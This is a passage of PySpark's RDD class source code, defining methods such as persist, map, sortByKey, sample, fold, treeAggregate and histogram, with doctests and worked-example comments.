self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY_SER}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY_SER)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY_SER):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY_SER}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD has been checkpointed or not
"""
return self._jrdd.rdd().isCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(f, iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(f, iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
        Returns the number of partitions in this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
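# Worked example of the cumulative-weight computation above: with
# weights=[2, 3], s is 5.0 and cweights becomes [0.0, 0.4, 1.0], so the
# two RDDRangeSamplers cover the ranges (0.0, 0.4) and (0.4, 1.0).
# Because both samplers share the same seed, every element falls into
# exactly one of the ranges, giving disjoint splits.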
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a large multiplier for the initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
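# Worked example of the formula above (with replacement): for
# sampleSizeLowerBound=100 and total=1000, fraction is 0.1 and the returned
# rate is 0.1 + 5 * sqrt(0.1 / 1000) = 0.1 + 5 * 0.01 = 0.15, i.e. we
# oversample to roughly 150 expected rows so that drawing fewer than 100
# becomes very unlikely. The without-replacement branch adds a similar
# log(delta)-based safety margin on top of the naive fraction.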
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts, but one of them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
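# Worked example of the boundary computation above: with numPartitions=3
# and 30 sorted sample keys, bounds are the samples at indices
# int(30 * 1 / 3) = 10 and int(30 * 2 / 3) = 20, so rangePartitioner
# splits the key space into three roughly equal ranges (the last range
# is bounded only implicitly).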
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
@ignore_unicode_prefix
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip(b'\n').decode('utf-8') for x in iter(pipe.stdout.readline, b''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative and commutative function and
a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
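# Illustrative sketch (not a doctest, assuming ``from operator import add``
# and 2 partitions): because zeroValue is folded into every partition *and*
# into the final merge, a non-neutral zero value is applied more than once:
#
#     sc.parallelize([1, 2, 3, 4], 2).fold(10, add)   # returns 40, not 20
#
# (10 is added once per partition and once more when merging the partial
# results), so zeroValue should be the identity element of ``op``.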
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
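# Worked example of the level computation above: with 10 input partitions
# and depth=2, scale = max(ceil(10 ** 0.5), 2) = 4. Since 10 > 4 + 10/4,
# one intermediate reduceByKey round shrinks the data to int(10 / 4) = 2
# partitions; the loop then stops because 2.5 > 4 + 2.5/4 is false, and the
# final combOp reduction runs on the driver over those 2 partially
# aggregated partitions.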
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
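# Usage sketch (not a doctest), assuming an interactive shell with ``sc``:
#
#     s = sc.parallelize([1.0, 2.0, 3.0, 4.0]).stats()
#     s.count()   # 4
#     s.mean()    # 2.5
#     s.sum()     # 10.0
#
# The returned StatCounter also exposes min(), max(), stdev(), variance(),
# sampleStdev() and sampleVariance().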
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, must not contain any duplicates, and must
have at least two elements.
If `buckets` is a number, it will generate buckets that are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity;
NaN values are skipped. If the elements in the RDD do not vary
(max == min), a single bucket is always returned.
It returns a tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
